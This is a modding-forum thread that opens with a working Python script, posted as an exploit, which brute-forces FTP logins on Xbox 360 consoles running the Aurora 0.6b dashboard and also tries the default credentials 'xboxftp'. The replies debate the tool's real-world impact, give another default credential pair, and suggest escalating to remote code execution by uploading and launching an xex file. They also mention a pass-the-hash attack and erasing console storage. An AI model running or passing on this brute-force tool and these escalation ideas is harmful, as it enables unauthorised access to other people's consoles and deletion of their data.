Jump to content
RealModScene
hielasangre

Xbox 360 Aurora 0.6b Default Credentials / FTP BruteForce Exploit

Recommended Posts

# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
# Date: 20/12/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: http://phoenix.xboxunity.net/#/news
# Tested on: XBOX 360
# GREETZ: Iker Legorreta, #RemoteExecution Team
 
 
 
#!/usr/bin/env python
# -*- coding:utf-8 -*-
 
__author__ = 'Daniel Godoy'
 
import argparse
import sys
from ftplib import FTP
 
info = '''
XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n
Usage: ./xbox_ftp_brute_forcer.py [options]\n
Options: -t, --target    <hostname/ip>   |   Target\n
         -u, --user      <user>          |   User\n
         -w, --wordlist  <filename>      |   Wordlist\n
         -h, --help      <help>          |   print help\n
 
Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt
'''
 
 
def help():
    print info
    sys.exit(0)
 
 
def check_default_login(target):
    try:
        ftp = FTP(target)
        ftp.login('xboxftp', 'xboxftp')
        ftp.quit()
        print "\n[+] Default login is open."
        print "\n[+] Username : xboxftp"
        print "\n[+] Password : xboxftp\n"
        ftp.quit()
    except:
        pass
 
 
def ftp_login(target, username, password):
    try:
        ftp = FTP(target)
        ftp.login(username, password)
        ftp.quit()
        print "\n[*] Credentials have found."
        print "\n[*] Username : {}".format(username)
        print "\n[*] Password : {}".format(password)
        return True
    except:
        return False
 
 
def brute_force(target, username, wordlist):
    try:
        wordlist = open(wordlist, "r")
        words = wordlist.readlines()
        for word in words:
            word = word.strip()
            if ftp_login(target, username, word):
                break
    except:
        print "\n[-] There is no such wordlist file. \n"
        sys.exit(0)
 
 
 
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target")
parser.add_argument("-u", "--username")
parser.add_argument("-w", "--wordlist")
 
args = parser.parse_args()
 
if not args.target or not args.username or not args.wordlist:
    help()
    sys.exit(0)
 
target = args.target
username = args.username
wordlist = args.wordlist
 
brute_force(target, username, wordlist)
check_default_login(target)
print "\n[-] Brute force finished. \n"

 

 

a simple code that allows attacking teams that have FTP enabled with the default password.


the console must have aurora 0.6b installed and have ftp enabled

 

 

 

  • Thanks 1
  • Confused 2

Share this post


Link to post
Share on other sites

Good job.

Check the default login first and afterwards use the wordlist.

İt may also be xbox:xbox

İ wouldnt call it exploit. İts more a tool.

Most people dont open ports for external use of the FTP, so the chances are low to find a vulnerable xbox on the internet. You would also have to find out its İP first. Utiliy scripting maybe. 

The FTP Plugin should be patched, but guess who is taking responibilities. 

  • Like 1

Share this post


Link to post
Share on other sites

it is true, thanks for the correction, it does not exploit a vulnerability but rather takes advantage of a default configuration.
It does not necessarily have to have internet access, it can be a local attack as well.

Share this post


Link to post
Share on other sites

In theory that is just like any brute force tool for FTP. We could add a security feature that shuts down FTP after 3 to 5 login attempts, but the reality is, that since you can disable FTP, and enable it when you can, and there isnt much of a chance of people opening the ports to the internet, I doubt it is high on the priority list. Also, most people dont bother changing the default username/password combination, so I am not sure how useful this is. On top of this, I wouldnt waste the time trying to bruteforce the password, when it is stored in plain text in the db, which I can get with another copy of aurora on a flash drive. That being said, this would also work on XBMC, Avalaunch, EvoX, UnleashX, FSD, etc, for both the 360, and the OG Xbox, and possibly most FTP servers on the internet. If you really wanted to make it into an exploit, you should make it upload an xex, and then execute that xex. Little known secret, Aurora is already set up to launch xex files from FTP. Your xex would have to clean itself up when done though, which is harder, as the system doesnt want you to erase the current running program. For more information on that, check out the FTP site commands. In all honesty, Aurora isnt really designed for high security applications, but  for being a simple game loader for our users, that is stable with large libraries, that alse has some other features to make life easy for those using a modified xbox  360. Also the easiest way to stop your script, is to change the ftp user, as it  only brute forces the password, and expects the username to either be default or specified. Nice to see an actual hacker on this site, as security testing is a hobbie of mine. lol. I have all sorts of exploits for things, not that I release my code much. Mainly just fixes for the exploits I find, if I think they are detrimental, or new features for something here or there. lol. It has been a while since I released anything, as my actual life has kept me too busy to be hacking stuff too much lately. lol.

Share this post


Link to post
Share on other sites

I totally agree that this attack does not have great impact, but I repeat that it is not necessary for the person to have open the ports since the attack can be done while inside the network (with the consent or not of the owner)
I do not consider myself a hacker, but I am passionate about the security of information.
A vulnerability often becomes as limited as one wants it to be ....
It is not of great impact but given the conditions it could be used to delete games without the consent of the owner of the console (just for annoying)
As you say, most of the ftps can have this error but they can be controlled through IDS, Firewall or different techniques.
My idea was to contribute with dawn and not make a criticism in a destructive way ... It is good what you point me to give a quality jump to an attack, I will keep it in mind and if it is something critical, I will improve my way of reporting them ..
ah, by the way, many times attacks are effective because the weakest link in the chain is the one that contributes (the end user)
a greeting and happy start to the year

https://www.owasp.org/index.php/Testing_for_default_credentials_(OTG-AUTHN-002)


PS: sorry for my bad English
 

 

 

DATA.jpg

Share this post


Link to post
Share on other sites

I get that, and while it could potentially end in some sort of data loss as far as games go, this is something that will probably never get a fix. Mainly, because there are better ways to pull off similar attacks, then brutforcing the FTP server in aurora. Such as installing a copy of aurora on a flash drive, and then plugging in that drive to the console and booting it. This will bypass any security you have set up within aurora, for the FTP server or otherwise. The xbox 360 as a console was never designed with security as a fundamental. No console is really set up for that, not in the way that a PC is. on top of that you can shut off the ftp sever when it isnt in use, and the attack is only viable when you are sitting in aurora, and once you launch a game the service is shutdown. The only way I could see this being "useful" is if someone gains access to your network, then to your console, then decides they want a place to dump information to. Even then, I would go after a PC, using a pass the hash attack on the SMB server, and dump my files there, just because there is more of a chance I will have access to it when I need it. Can you tell you arent the only hacker in the scene. lol. That being said, most of the community around modded consoles are the users, and they dont really understand the vulnerabilities, that are being exploited to mod the console they are using anyway, they just want it to work for them. Or, that is the impression I have gotten in my many years in the scene.

Share this post


Link to post
Share on other sites

Tbh, who uses their 360 on a public internet? Thats the most vulnerable.. 

But using your ideas, one could get dashlaunch to load, and have the ftpserver there or update server.. and erase the nand.. lol.. but.. all in all, this isnt all that much of a threat, as 1: i never use open network, 2: i have required tools to re-write nand, and 3: i actually own my games.. so someone erasing the hdd wouldnt be all that much of a problem to me.. 

 

Now tbh this seems more like a way to piss off your friends.. instead of doing something worth while with the idea..

Share this post


Link to post
Share on other sites

No dije que sea muy peligroso, una prueba de concepto es suficiente para realizar un ataque ( de hecho el ataque es local ) 
No era la idea que se molesten o similar, solo es un vector de ataque, a lo mejor tienen la idea de que una vulnerabilidad no tiene importancia porque no se ven afectados, pero aun asi no deja de serlo.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×